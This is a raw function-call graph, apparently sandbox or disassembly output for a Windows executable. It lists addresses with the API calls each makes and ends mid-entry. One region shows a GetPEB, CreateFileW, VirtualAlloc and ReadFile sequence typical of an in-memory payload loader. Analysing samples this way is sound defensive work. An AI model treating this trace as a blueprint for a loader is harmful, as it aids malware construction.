97133->97136 97134->97133 97153 5133c6 97134->97153 97136->97118 97137 5533f9 97138 5133c6 22 API calls 97137->97138 97138->97133 97140 52fe0b 22 API calls 97139->97140 97141 516295 97140->97141 97142 52fddb 22 API calls 97141->97142 97143 51394d 97142->97143 97143->97122 97143->97123 97145 516362 97144->97145 97146 554a51 97144->97146 97162 516373 97145->97162 97172 514a88 22 API calls __fread_nolock 97146->97172 97149 51636e 97149->97133 97150 554a5b 97151 554a67 97150->97151 97152 51a8c7 22 API calls 97150->97152 97152->97151 97154 5133dd 97153->97154 97155 5530bb 97153->97155 97178 5133ee 97154->97178 97157 52fddb 22 API calls 97155->97157 97158 5530c5 _wcslen 97157->97158 97160 52fe0b 22 API calls 97158->97160 97159 5133e8 97159->97137 97161 5530fe __fread_nolock 97160->97161 97164 516382 97162->97164 97169 5163b6 __fread_nolock 97162->97169 97163 554a82 97166 52fddb 22 API calls 97163->97166 97164->97163 97165 5163a9 97164->97165 97164->97169 97173 51a587 97165->97173 97168 554a91 97166->97168 97170 52fe0b 22 API calls 97168->97170 97169->97149 97171 554ac5 __fread_nolock 97170->97171 97172->97150 97174 51a59d 97173->97174 97177 51a598 __fread_nolock 97173->97177 97175 55f80f 97174->97175 97176 52fe0b 22 API calls 97174->97176 97176->97177 97177->97169 97179 5133fe _wcslen 97178->97179 97180 513411 97179->97180 97181 55311d 97179->97181 97183 51a587 22 API calls 97180->97183 97182 52fddb 22 API calls 97181->97182 97184 553127 97182->97184 97185 51341e __fread_nolock 97183->97185 97186 52fe0b 22 API calls 97184->97186 97185->97159 97187 553157 __fread_nolock 97186->97187 97188 5303fb 97189 530407 ___scrt_is_nonwritable_in_current_image 97188->97189 97217 52feb1 97189->97217 97191 53040e 97192 530561 97191->97192 97195 530438 97191->97195 97244 53083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97192->97244 97194 530568 97245 534e52 28 API calls _abort 97194->97245 97206 530477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97195->97206 97228 54247d 97195->97228 97197 53056e 97246 534e04 28 API calls _abort 97197->97246 97201 530576 97202 530457 97204 5304d8 97236 530959 97204->97236 97206->97204 97240 534e1a 38 API calls 2 library calls 97206->97240 97208 5304de 97209 5304f3 97208->97209 97241 530992 GetModuleHandleW 97209->97241 97211 5304fa 97211->97194 97212 5304fe 97211->97212 97213 530507 97212->97213 97242 534df5 28 API calls _abort 97212->97242 97243 530040 13 API calls 2 library calls 97213->97243 97216 53050f 97216->97202 97218 52feba 97217->97218 97247 530698 IsProcessorFeaturePresent 97218->97247 97220 52fec6 97248 532c94 10 API calls 3 library calls 97220->97248 97222 52fecb 97227 52fecf 97222->97227 97249 542317 97222->97249 97225 52fee6 97225->97191 97227->97191 97229 542494 97228->97229 97230 530a8c CatchGuardHandler 5 API calls 97229->97230 97231 530451 97230->97231 97231->97202 97232 542421 97231->97232 97233 542450 97232->97233 97234 530a8c CatchGuardHandler 5 API calls 97233->97234 97235 542479 97234->97235 97235->97206 97300 532340 97236->97300 97239 53097f 97239->97208 97240->97204 97241->97211 97242->97213 97243->97216 97244->97194 97245->97197 97246->97201 97247->97220 97248->97222 97253 54d1f6 97249->97253 97252 532cbd 8 API calls 3 library calls 97252->97227 97256 54d213 97253->97256 97257 54d20f 97253->97257 97254 530a8c CatchGuardHandler 5 API calls 97255 52fed8 97254->97255 97255->97225 97255->97252 97256->97257 97259 544bfb 97256->97259 97257->97254 97260 544c07 ___scrt_is_nonwritable_in_current_image 97259->97260 97271 542f5e EnterCriticalSection 97260->97271 97262 544c0e 97272 5450af 97262->97272 97264 544c1d 97270 544c2c 97264->97270 97285 544a8f 29 API calls 97264->97285 97267 544c27 97286 544b45 GetStdHandle GetFileType 97267->97286 97268 544c3d __fread_nolock 97268->97256 97287 544c48 LeaveCriticalSection _abort 97270->97287 97271->97262 97273 5450bb ___scrt_is_nonwritable_in_current_image 97272->97273 97274 5450df 97273->97274 97275 5450c8 97273->97275 97288 542f5e EnterCriticalSection 97274->97288 97296 53f2d9 20 API calls _free 97275->97296 97278 5450cd 97297 5427ec 26 API calls ___std_exception_copy 97278->97297 97280 545117 97298 54513e LeaveCriticalSection _abort 97280->97298 97281 5450d7 __fread_nolock 97281->97264 97282 5450eb 97282->97280 97289 545000 97282->97289 97285->97267 97286->97270 97287->97268 97288->97282 97290 544c7d pre_c_initialization 20 API calls 97289->97290 97291 545012 97290->97291 97295 54501f 97291->97295 97299 543405 11 API calls 2 library calls 97291->97299 97292 5429c8 _free 20 API calls 97294 545071 97292->97294 97294->97282 97295->97292 97296->97278 97297->97281 97298->97281 97299->97291 97301 53096c GetStartupInfoW 97300->97301 97301->97239 97302 511098 97307 5142de 97302->97307 97306 5110a7 97308 51a961 22 API calls 97307->97308 97309 5142f5 GetVersionExW 97308->97309 97310 516b57 22 API calls 97309->97310 97311 514342 97310->97311 97312 5193b2 22 API calls 97311->97312 97324 514378 97311->97324 97313 51436c 97312->97313 97315 5137a0 22 API calls 97313->97315 97314 51441b GetCurrentProcess IsWow64Process 97316 514437 97314->97316 97315->97324 97317 553824 GetSystemInfo 97316->97317 97318 51444f LoadLibraryA 97316->97318 97319 514460 GetProcAddress 97318->97319 97320 51449c GetSystemInfo 97318->97320 97319->97320 97322 514470 GetNativeSystemInfo 97319->97322 97323 514476 97320->97323 97321 5537df 97322->97323 97325 51109d 97323->97325 97326 51447a FreeLibrary 97323->97326 97324->97314 97324->97321 97327 5300a3 29 API calls __onexit 97325->97327 97326->97325 97327->97306 97328 51105b 97333 51344d 97328->97333 97330 51106a 97364 5300a3 29 API calls __onexit 97330->97364 97332 511074 97334 51345d __wsopen_s 97333->97334 97335 51a961 22 API calls 97334->97335 97336 513513 97335->97336 97337 513a5a 24 API calls 97336->97337 97338 51351c 97337->97338 97365 513357 97338->97365 97341 5133c6 22 API calls 97342 513535 97341->97342 97343 51515f 22 API calls 97342->97343 97344 513544 97343->97344 97345 51a961 22 API calls 97344->97345 97346 51354d 97345->97346 97347 51a6c3 22 API calls 97346->97347 97348 513556 RegOpenKeyExW 97347->97348 97349 553176 RegQueryValueExW 97348->97349 97353 513578 97348->97353 97350 553193 97349->97350 97351 55320c RegCloseKey 97349->97351 97352 52fe0b 22 API calls 97350->97352 97351->97353 97361 55321e _wcslen 97351->97361 97354 5531ac 97352->97354 97353->97330 97356 515722 22 API calls 97354->97356 97355 514c6d 22 API calls 97355->97361 97357 5531b7 RegQueryValueExW 97356->97357 97358 5531d4 97357->97358 97360 5531ee messages 97357->97360 97359 516b57 22 API calls 97358->97359 97359->97360 97360->97351 97361->97353 97361->97355 97362 519cb3 22 API calls 97361->97362 97363 51515f 22 API calls 97361->97363 97362->97361 97363->97361 97364->97332 97366 551f50 __wsopen_s 97365->97366 97367 513364 GetFullPathNameW 97366->97367 97368 513386 97367->97368 97369 516b57 22 API calls 97368->97369 97370 5133a4 97369->97370 97370->97341 97371 5490fa 97372 549107 97371->97372 97376 54911f 97371->97376 97421 53f2d9 20 API calls _free 97372->97421 97374 54910c 97422 5427ec 26 API calls ___std_exception_copy 97374->97422 97377 54917a 97376->97377 97383 549117 97376->97383 97423 54fdc4 21 API calls 2 library calls 97376->97423 97378 53d955 __fread_nolock 26 API calls 97377->97378 97380 549192 97378->97380 97391 548c32 97380->97391 97382 549199 97382->97383 97384 53d955 __fread_nolock 26 API calls 97382->97384 97385 5491c5 97384->97385 97385->97383 97386 53d955 __fread_nolock 26 API calls 97385->97386 97387 5491d3 97386->97387 97387->97383 97388 53d955 __fread_nolock 26 API calls 97387->97388 97389 5491e3 97388->97389 97390 53d955 __fread_nolock 26 API calls 97389->97390 97390->97383 97392 548c3e ___scrt_is_nonwritable_in_current_image 97391->97392 97393 548c46 97392->97393 97394 548c5e 97392->97394 97425 53f2c6 20 API calls _free 97393->97425 97396 548d24 97394->97396 97400 548c97 97394->97400 97432 53f2c6 20 API calls _free 97396->97432 97397 548c4b 97426 53f2d9 20 API calls _free 97397->97426 97403 548ca6 97400->97403 97404 548cbb 97400->97404 97401 548d29 97433 53f2d9 20 API calls _free 97401->97433 97402 548c53 __fread_nolock 97402->97382 97427 53f2c6 20 API calls _free 97403->97427 97424 545147 EnterCriticalSection 97404->97424 97408 548cc1 97410 548cf2 97408->97410 97411 548cdd 97408->97411 97409 548cab 97428 53f2d9 20 API calls _free 97409->97428 97415 548d45 __fread_nolock 38 API calls 97410->97415 97429 53f2d9 20 API calls _free 97411->97429 97418 548ced 97415->97418 97416 548cb3 97434 5427ec 26 API calls ___std_exception_copy 97416->97434 97417 548ce2 97430 53f2c6 20 API calls _free 97417->97430 97431 548d1c LeaveCriticalSection __wsopen_s 97418->97431 97421->97374 97422->97383 97423->97377 97424->97408 97425->97397 97426->97402 97427->97409 97428->97416 97429->97417 97430->97418 97431->97402 97432->97401 97433->97416 97434->97402 97435 51f7bf 97436 51f7d3 97435->97436 97437 51fcb6 97435->97437 97439 51fcc2 97436->97439 97440 52fddb 22 API calls 97436->97440 97528 51aceb 23 API calls messages 97437->97528 97529 51aceb 23 API calls messages 97439->97529 97442 51f7e5 97440->97442 97442->97439 97443 51fd3d 97442->97443 97444 51f83e 97442->97444 97530 581155 22 API calls 97443->97530 97468 51ed9d messages 97444->97468 97470 521310 97444->97470 97447 51fef7 97454 51a8c7 22 API calls 97447->97454 97447->97468 97449 52fddb 22 API calls 97467 51ec76 messages 97449->97467 97451 564600 97456 51a8c7 22 API calls 97451->97456 97451->97468 97452 564b0b 97532 58359c 82 API calls __wsopen_s 97452->97532 97454->97468 97456->97468 97458 51a8c7 22 API calls 97458->97467 97459 530242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97459->97467 97460 51fbe3 97462 564bdc 97460->97462 97460->97468 97469 51f3ae messages 97460->97469 97461 51a961 22 API calls 97461->97467 97533 58359c 82 API calls __wsopen_s 97462->97533 97464 564beb 97534 58359c 82 API calls __wsopen_s 97464->97534 97465 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97465->97467 97466 5300a3 29 API calls pre_c_initialization 97466->97467 97467->97447 97467->97449 97467->97451 97467->97452 97467->97458 97467->97459 97467->97460 97467->97461 97467->97464 97467->97465 97467->97466 97467->97468 97467->97469 97526 5201e0 235 API calls 2 library calls 97467->97526 97527 5206a0 41 API calls messages 97467->97527 97469->97468 97531 58359c 82 API calls __wsopen_s 97469->97531 97471 5217b0 97470->97471 97472 521376 97470->97472 97644 530242 5 API calls __Init_thread_wait 97471->97644 97474 521390 97472->97474 97475 566331 97472->97475 97535 521940 97474->97535 97649 59709c 235 API calls 97475->97649 97477 5217ba 97480 5217fb 97477->97480 97483 519cb3 22 API calls 97477->97483 97479 56633d 97479->97467 97485 566346 97480->97485 97487 52182c 97480->97487 97482 521940 9 API calls 97484 5213b6 97482->97484 97491 5217d4 97483->97491 97484->97480 97486 5213ec 97484->97486 97650 58359c 82 API calls __wsopen_s 97485->97650 97486->97485 97510 521408 __fread_nolock 97486->97510 97646 51aceb 23 API calls messages 97487->97646 97490 521839 97647 52d217 235 API calls 97490->97647 97645 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97491->97645 97494 56636e 97651 58359c 82 API calls __wsopen_s 97494->97651 97495 52152f 97497 5663d1 97495->97497 97498 52153c 97495->97498 97653 595745 54 API calls _wcslen 97497->97653 97500 521940 9 API calls 97498->97500 97501 521549 97500->97501 97504 5664fa 97501->97504 97506 521940 9 API calls 97501->97506 97502 52fddb 22 API calls 97502->97510 97503 52fe0b 22 API calls 97503->97510 97514 566369 97504->97514 97654 58359c 82 API calls __wsopen_s 97504->97654 97505 521872 97648 52faeb 23 API calls 97505->97648 97512 521563 97506->97512 97509 51ec40 235 API calls 97509->97510 97510->97490 97510->97494 97510->97495 97510->97502 97510->97503 97510->97509 97511 5663b2 97510->97511 97510->97514 97652 58359c 82 API calls __wsopen_s 97511->97652 97512->97504 97515 51a8c7 22 API calls 97512->97515 97517 5215c7 messages 97512->97517 97514->97467 97515->97517 97516 521940 9 API calls 97516->97517 97517->97504 97517->97505 97517->97514 97517->97516 97520 52167b messages 97517->97520 97545 586ef1 97517->97545 97625 59958b 97517->97625 97628 59959f 97517->97628 97631 58f0ec 97517->97631 97640 57d4ce 97517->97640 97518 52171d 97518->97467 97520->97518 97643 52ce17 22 API calls messages 97520->97643 97526->97467 97527->97467 97528->97439 97529->97443 97530->97468 97531->97468 97532->97468 97533->97464 97534->97468 97536 521981 97535->97536 97540 52195d 97535->97540 97655 530242 5 API calls __Init_thread_wait 97536->97655 97539 52198b 97539->97540 97656 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97539->97656 97544 5213a0 97540->97544 97657 530242 5 API calls __Init_thread_wait 97540->97657 97541 528727 97541->97544 97658 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97541->97658 97544->97482 97546 51a961 22 API calls 97545->97546 97547 586f1d 97546->97547 97548 51a961 22 API calls 97547->97548 97549 586f26 97548->97549 97550 586f3a 97549->97550 97833 51b567 39 API calls 97549->97833 97659 517510 97550->97659 97553 586fbc 97556 517510 53 API calls 97553->97556 97554 5870bf 97555 514ecb 94 API calls 97554->97555 97557 5870d0 97555->97557 97559 586fc8 97556->97559 97561 5870e5 97557->97561 97563 514ecb 94 API calls 97557->97563 97558 586f57 _wcslen 97558->97553 97558->97554 97566 5870e9 97558->97566 97560 586fdb 97559->97560 97562 51a8c7 22 API calls 97559->97562 97568 587027 97560->97568 97570 587005 97560->97570 97574 51a8c7 22 API calls 97560->97574 97564 51a961 22 API calls 97561->97564 97561->97566 97562->97560 97563->97561 97565 58711a 97564->97565 97567 51a961 22 API calls 97565->97567 97566->97517 97569 587126 97567->97569 97571 517510 53 API calls 97568->97571 97573 51a961 22 API calls 97569->97573 97575 5133c6 22 API calls 97570->97575 97572 587034 97571->97572 97576 58703d 97572->97576 97577 587047 97572->97577 97578 58712f 97573->97578 97574->97570 97579 58700f 97575->97579 97580 51a8c7 22 API calls 97576->97580 97834 57e199 GetFileAttributesW 97577->97834 97582 51a961 22 API calls 97578->97582 97583 517510 53 API calls 97579->97583 97580->97577 97585 587138 97582->97585 97586 58701b 97583->97586 97584 587050 97587 587063 97584->97587 97590 514c6d 22 API calls 97584->97590 97588 517510 53 API calls 97585->97588 97589 516350 22 API calls 97586->97589 97592 517510 53 API calls 97587->97592 97597 587069 97587->97597 97591 587145 97588->97591 97589->97568 97590->97587 97682 51525f 97591->97682 97594 5870a0 97592->97594 97835 57d076 57 API calls 97594->97835 97596 587166 97598 514c6d 22 API calls 97596->97598 97597->97566 97599 587175 97598->97599 97600 5871a9 97599->97600 97602 514c6d 22 API calls 97599->97602 97601 51a8c7 22 API calls 97600->97601 97603 5871ba 97601->97603 97604 587186 97602->97604 97605 516350 22 API calls 97603->97605 97604->97600 97606 516b57 22 API calls 97604->97606 97607 5871c8 97605->97607 97608 58719b 97606->97608 97609 516350 22 API calls 97607->97609 97610 516b57 22 API calls 97608->97610 97611 5871d6 97609->97611 97610->97600 97612 516350 22 API calls 97611->97612 97613 5871e4 97612->97613 97614 517510 53 API calls 97613->97614 97615 5871f0 97614->97615 97724 57d7bc 97615->97724 97617 587201 97618 57d4ce 4 API calls 97617->97618 97619 58720b 97618->97619 97620 517510 53 API calls 97619->97620 97624 587239 97619->97624 97621 587229 97620->97621 97778 582947 97621->97778 97623 514f39 68 API calls 97623->97566 97624->97623 97863 597f59 97625->97863 97627 59959b 97627->97517 97629 597f59 120 API calls 97628->97629 97630 5995af 97629->97630 97630->97517 97632 517510 53 API calls 97631->97632 97633 58f126 97632->97633 97955 519e90 97633->97955 97635 58f136 97636 58f15b 97635->97636 97637 51ec40 235 API calls 97635->97637 97639 58f15f 97636->97639 97983 519c6e 22 API calls 97636->97983 97637->97636 97639->97517 97999 57dbbe lstrlenW 97640->97999 97643->97520 97644->97477 97645->97480 97646->97490 97647->97505 97648->97505 97649->97479 97650->97514 97651->97514 97652->97514 97653->97512 97654->97514 97655->97539 97656->97540 97657->97541 97658->97544 97660 517522 97659->97660 97661 517525 97659->97661 97660->97558 97662 51755b 97661->97662 97663 51752d 97661->97663 97665 5550f6 97662->97665 97666 51756d 97662->97666 97673 55500f 97662->97673 97836 5351c6 26 API calls 97663->97836 97839 535183 26 API calls 97665->97839 97837 52fb21 51 API calls 97666->97837 97667 51753d 97672 52fddb 22 API calls 97667->97672 97670 55510e 97670->97670 97674 517547 97672->97674 97675 555088 97673->97675 97677 52fe0b 22 API calls 97673->97677 97676 519cb3 22 API calls 97674->97676 97838 52fb21 51 API calls 97675->97838 97676->97660 97678 555058 97677->97678 97679 52fddb 22 API calls 97678->97679 97680 55507f 97679->97680 97681 519cb3 22 API calls 97680->97681 97681->97675 97683 51a961 22 API calls 97682->97683 97684 515275 97683->97684 97685 51a961 22 API calls 97684->97685 97686 51527d 97685->97686 97687 51a961 22 API calls 97686->97687 97688 515285 97687->97688 97689 51a961 22 API calls 97688->97689 97690 51528d 97689->97690 97691 553df5 97690->97691 97692 5152c1 97690->97692 97693 51a8c7 22 API calls 97691->97693 97694 516d25 22 API calls 97692->97694 97695 553dfe 97693->97695 97696 5152cf 97694->97696 97697 51a6c3 22 API calls 97695->97697 97698 5193b2 22 API calls 97696->97698 97700 515304 97697->97700 97699 5152d9 97698->97699 97699->97700 97701 516d25 22 API calls 97699->97701 97702 515349 97700->97702 97703 515325 97700->97703 97713 553e20 97700->97713 97705 5152fa 97701->97705 97840 516d25 97702->97840 97703->97702 97708 514c6d 22 API calls 97703->97708 97707 5193b2 22 API calls 97705->97707 97706 51535a 97709 515370 97706->97709 97715 51a8c7 22 API calls 97706->97715 97707->97700 97711 515332 97708->97711 97710 515384 97709->97710 97716 51a8c7 22 API calls 97709->97716 97714 51538f 97710->97714 97718 51a8c7 22 API calls 97710->97718 97711->97702 97717 516d25 22 API calls 97711->97717 97712 516b57 22 API calls 97721 553ee0 97712->97721 97713->97712 97719 51a8c7 22 API calls 97714->97719 97723 51539a 97714->97723 97715->97709 97716->97710 97717->97702 97718->97714 97719->97723 97720 514c6d 22 API calls 97720->97721 97721->97702 97721->97720 97853 5149bd 22 API calls __fread_nolock 97721->97853 97723->97596 97725 57d7d8 97724->97725 97726 57d7f3 97725->97726 97727 57d7dd 97725->97727 97728 51a961 22 API calls 97726->97728 97729 51a8c7 22 API calls 97727->97729 97777 57d7ee 97727->97777 97730 57d7fb 97728->97730 97729->97777 97731 51a961 22 API calls 97730->97731 97732 57d803 97731->97732 97733 51a961 22 API calls 97732->97733 97734 57d80e 97733->97734 97735 51a961 22 API calls 97734->97735 97736 57d816 97735->97736 97737 51a961 22 API calls 97736->97737 97738 57d81e 97737->97738 97739 51a961 22 API calls 97738->97739 97740 57d826 97739->97740 97741 51a961 22 API calls 97740->97741 97742 57d82e 97741->97742 97743 51a961 22 API calls 97742->97743 97744 57d836 97743->97744 97745 51525f 22 API calls 97744->97745 97746 57d84d 97745->97746 97747 51525f 22 API calls 97746->97747 97748 57d866 97747->97748 97749 514c6d 22 API calls 97748->97749 97750 57d872 97749->97750 97751 57d885 97750->97751 97752 5193b2 22 API calls 97750->97752 97753 514c6d 22 API calls 97751->97753 97752->97751 97754 57d88e 97753->97754 97756 57d89e 97754->97756 97757 5193b2 22 API calls 97754->97757 97755 57d8b0 97759 516350 22 API calls 97755->97759 97756->97755 97758 51a8c7 22 API calls 97756->97758 97757->97756 97758->97755 97760 57d8bb 97759->97760 97855 57d978 22 API calls 97760->97855 97762 57d8ca 97856 57d978 22 API calls 97762->97856 97764 57d8dd 97765 514c6d 22 API calls 97764->97765 97766 57d8e7 97765->97766 97767 57d8fe 97766->97767 97768 57d8ec 97766->97768 97769 514c6d 22 API calls 97767->97769 97770 5133c6 22 API calls 97768->97770 97771 57d907 97769->97771 97772 57d8f9 97770->97772 97773 57d925 97771->97773 97774 5133c6 22 API calls 97771->97774 97775 516350 22 API calls 97772->97775 97776 516350 22 API calls 97773->97776 97774->97772 97775->97773 97776->97777 97777->97617 97779 582954 __wsopen_s 97778->97779 97780 52fe0b 22 API calls 97779->97780 97781 582971 97780->97781 97782 515722 22 API calls 97781->97782 97783 58297b 97782->97783 97784 58274e 27 API calls 97783->97784 97785 582986 97784->97785 97786 51511f 64 API calls 97785->97786 97787 58299b 97786->97787 97788 582a6c 97787->97788 97789 5829bf 97787->97789 97790 582e66 75 API calls 97788->97790 97791 582e66 75 API calls 97789->97791 97806 582a38 97790->97806 97792 5829c4 97791->97792 97797 582a75 messages 97792->97797 97861 53d583 26 API calls 97792->97861 97794 5150f5 40 API calls 97795 582a91 97794->97795 97796 5150f5 40 API calls 97795->97796 97799 582aa1 97796->97799 97797->97624 97798 5829ed 97862 53d583 26 API calls 97798->97862 97800 5150f5 40 API calls 97799->97800 97802 582abc 97800->97802 97803 5150f5 40 API calls 97802->97803 97804 582acc 97803->97804 97805 5150f5 40 API calls 97804->97805 97807 582ae7 97805->97807 97806->97794 97806->97797 97808 5150f5 40 API calls 97807->97808 97809 582af7 97808->97809 97810 5150f5 40 API calls 97809->97810 97811 582b07 97810->97811 97812 5150f5 40 API calls 97811->97812 97813 582b17 97812->97813 97857 583017 GetTempPathW GetTempFileNameW 97813->97857 97815 582b22 97816 53e5eb 29 API calls 97815->97816 97818 582b33 97816->97818 97817 53e678 67 API calls 97819 582bf8 97817->97819 97818->97797 97820 5150f5 40 API calls 97818->97820 97828 53dbb3 65 API calls 97818->97828 97829 582bed 97818->97829 97821 582bfe DeleteFileW 97819->97821 97822 582c12 97819->97822 97820->97818 97821->97797 97823 582c18 97822->97823 97824 582c91 CopyFileW 97822->97824 97830 5822ce 79 API calls 97823->97830 97825 582cb9 DeleteFileW 97824->97825 97826 582ca7 DeleteFileW 97824->97826 97858 582fd8 CreateFileW 97825->97858 97826->97797 97828->97818 97829->97817 97831 582c7c 97830->97831 97831->97825 97832 582c80 DeleteFileW 97831->97832 97832->97797 97833->97550 97834->97584 97835->97597 97836->97667 97837->97667 97838->97665 97839->97670 97841 516d91 97840->97841 97842 516d34 97840->97842 97843 5193b2 22 API calls 97841->97843 97842->97841 97844 516d3f 97842->97844 97845 516d62 __fread_nolock 97843->97845 97846 554c9d 97844->97846 97847 516d5a 97844->97847 97845->97706 97848 52fddb 22 API calls 97846->97848 97854 516f34 22 API calls 97847->97854 97850 554ca7 97848->97850 97851 52fe0b 22 API calls 97850->97851 97852 554cda 97851->97852 97853->97721 97854->97845 97855->97762 97856->97764 97857->97815 97859 582fff SetFileTime CloseHandle 97858->97859 97860 583013 97858->97860 97859->97860 97860->97797 97861->97798 97862->97806 97864 517510 53 API calls 97863->97864 97865 597f90 97864->97865 97887 597fd5 messages 97865->97887 97901 598cd3 97865->97901 97867 598281 97868 59844f 97867->97868 97873 59828f 97867->97873 97942 598ee4 60 API calls 97868->97942 97871 59845e 97872 59846a 97871->97872 97871->97873 97872->97887 97914 597e86 97873->97914 97874 517510 53 API calls 97893 598049 97874->97893 97879 5982c8 97929 52fc70 97879->97929 97882 5982e8 97935 58359c 82 API calls __wsopen_s 97882->97935 97883 598302 97936 5163eb 22 API calls 97883->97936 97886 5982f3 GetCurrentProcess TerminateProcess 97886->97883 97887->97627 97888 598311 97937 516a50 22 API calls 97888->97937 97890 59832a 97891 598352 97890->97891 97938 5204f0 22 API calls 97890->97938 97894 5984c5 97891->97894 97940 5204f0 22 API calls 97891->97940 97941 51aceb 23 API calls messages 97891->97941 97943 598b7b 75 API calls 97891->97943 97893->97867 97893->97874 97893->97887 97933 57417d 22 API calls __fread_nolock 97893->97933 97934 59851d 42 API calls _strftime 97893->97934 97894->97887 97898 5984d9 FreeLibrary 97894->97898 97895 598341 97939 598b7b 75 API calls 97895->97939 97898->97887 97902 51aec9 22 API calls 97901->97902 97903 598cee CharLowerBuffW 97902->97903 97944 578e54 97903->97944 97907 51a961 22 API calls 97908 598d2a 97907->97908 97909 516d25 22 API calls 97908->97909 97910 598d3e 97909->97910 97911 5193b2 22 API calls 97910->97911 97913 598d48 _wcslen 97911->97913 97912 598e5e _wcslen 97912->97893 97913->97912 97951 59851d 42 API calls _strftime 97913->97951 97915 597ea1 97914->97915 97919 597eec 97914->97919 97916 52fe0b 22 API calls 97915->97916 97917 597ec3 97916->97917 97918 52fddb 22 API calls 97917->97918 97917->97919 97918->97917 97920 599096 97919->97920 97921 5992ab messages 97920->97921 97928 5990ba _strcat _wcslen 97920->97928 97921->97879 97922 51b567 39 API calls 97922->97928 97923 51b38f 39 API calls 97923->97928 97924 51b6b5 39 API calls 97924->97928 97925 517510 53 API calls 97925->97928 97926 53ea0c 21 API calls ___std_exception_copy 97926->97928 97928->97921 97928->97922 97928->97923 97928->97924 97928->97925 97928->97926 97954 57efae 24 API calls _wcslen 97928->97954 97931 52fc85 97929->97931 97930 52fd1d VirtualProtect 97932 52fceb 97930->97932 97931->97930 97931->97932 97932->97882 97932->97883 97933->97893 97934->97893 97935->97886 97936->97888 97937->97890 97938->97895 97939->97891 97940->97891 97941->97891 97942->97871 97943->97891 97945 578e74 _wcslen 97944->97945 97946 578f63 97945->97946 97947 578ea9 97945->97947 97950 578f68 97945->97950 97946->97907 97946->97913 97947->97946 97952 52ce60 41 API calls 97947->97952 97950->97946 97953 52ce60 41 API calls 97950->97953 97951->97912 97952->97947 97953->97950 97954->97928 97956 516270 22 API calls 97955->97956 97976 519eb5 97956->97976 97957 519fd2 97985 51a4a1 97957->97985 97959 519fec 97959->97635 97962 55f7c4 97997 5796e2 84 API calls __wsopen_s 97962->97997 97963 55f699 97971 52fddb 22 API calls 97963->97971 97964 51a405 97964->97959 97998 5796e2 84 API calls __wsopen_s 97964->97998 97965 51a4a1 22 API calls 97965->97976 97969 51a6c3 22 API calls 97969->97976 97970 55f7d2 97972 51a4a1 22 API calls 97970->97972 97973 55f754 97971->97973 97974 55f7e8 97972->97974 97975 52fe0b 22 API calls 97973->97975 97974->97959 97979 51a12c __fread_nolock 97975->97979 97976->97957 97976->97962 97976->97963 97976->97964 97976->97965 97976->97969 97978 51a587 22 API calls 97976->97978 97976->97979 97980 51aec9 22 API calls 97976->97980 97984 514573 41 API calls _wcslen 97976->97984 97994 5148c8 23 API calls 97976->97994 97995 5149bd 22 API calls __fread_nolock 97976->97995 97996 51a673 22 API calls 97976->97996 97978->97976 97979->97962 97979->97964 97981 51a0db CharUpperBuffW 97980->97981 97993 51a673 22 API calls 97981->97993 97983->97639 97984->97976 97986 51a52b 97985->97986 97992 51a4b1 __fread_nolock 97985->97992 97988 52fe0b 22 API calls 97986->97988 97987 52fddb 22 API calls 97989 51a4b8 97987->97989 97988->97992 97990 51a4d6 97989->97990 97991 52fddb 22 API calls 97989->97991 97990->97959 97991->97990 97992->97987 97993->97976 97994->97976 97995->97976 97996->97976 97997->97970 97998->97959 98000 57d4d5 97999->98000 98001 57dbdc GetFileAttributesW 97999->98001 98000->97517 98001->98000 98002 57dbe8 FindFirstFileW 98001->98002 98002->98000 98003 57dbf9 FindClose 98002->98003 98003->98000 98004 552ba5 98005 512b25 98004->98005 98006 552baf 98004->98006 98032 512b83 7 API calls 98005->98032 98008 513a5a 24 API calls 98006->98008 98010 552bb8 98008->98010 98012 519cb3 22 API calls 98010->98012 98014 552bc6 98012->98014 98013 512b2f 98023 512b44 98013->98023 98036 513837 49 API calls ___scrt_fastfail 98013->98036 98015 552bf5 98014->98015 98016 552bce 98014->98016 98019 5133c6 22 API calls 98015->98019 98017 5133c6 22 API calls 98016->98017 98020 552bd9 98017->98020 98031 552bf1 GetForegroundWindow ShellExecuteW 98019->98031 98022 516350 22 API calls 98020->98022 98027 552be7 98022->98027 98024 512b5f 98023->98024 98037 5130f2 Shell_NotifyIconW ___scrt_fastfail 98023->98037 98028 512b66 SetCurrentDirectoryW 98024->98028 98026 552c26 98026->98024 98029 5133c6 22 API calls 98027->98029 98030 512b7a 98028->98030 98029->98031 98031->98026 98038 512cd4 7 API calls 98032->98038 98034 512b2a 98035 512c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98034->98035 98035->98013 98036->98023 98037->98024 98038->98034 98039 1720c00 98053 171e7e0 98039->98053 98041 1720cce 98056 1720af0 98041->98056 98043 1720cf7 CreateFileW 98045 1720d4b 98043->98045 98052 1720d46 98043->98052 98046 1720d62 VirtualAlloc 98045->98046 98045->98052 98047 1720d83 ReadFile 98046->98047 98046->98052 98048 1720d9e 98047->98048 98047->98052 98049 171f850 12 API calls 98048->98049 98050 1720db8 98049->98050 98051 171faf0 GetPEB GetPEB 98050->98051 98051->98052 98059 1721d10 GetPEB 98053->98059 98055 171ee6b 98055->98041 98057 1720af9 Sleep 98056->98057 98058 1720b07 98057->98058 98060 1721d3a 98059->98060 98060->98055 98061 512de3 98062 512df0 __wsopen_s 98061->98062 98063 512e09 98062->98063 98064 552c2b ___scrt_fastfail 98062->98064 98065 513aa2 23 API calls 98063->98065 98066 552c47 GetOpenFileNameW 98064->98066 98067 512e12 98065->98067 98068 552c96 98066->98068 98077 512da5 98067->98077 98070 516b57 22 API calls 98068->98070 98072 552cab 98070->98072 98072->98072 98074 512e27 98095 5144a8 98074->98095 98078 551f50 __wsopen_s 98077->98078 98079 512db2 GetLongPathNameW 98078->98079 98080 516b57 22 API calls 98079->98080 98081 512dda 98080->98081 98082 513598 98081->98082 98083 51a961 22 API calls 98082->98083 98084 5135aa 98083->98084 98085 513aa2 23 API calls 98084->98085 98086 5135b5 98085->98086 98087 5135c0 98086->98087 98088 5532eb 98086->98088 98090 51515f 22 API calls 98087->98090 98092 55330d 98088->98092 98131 52ce60 41 API 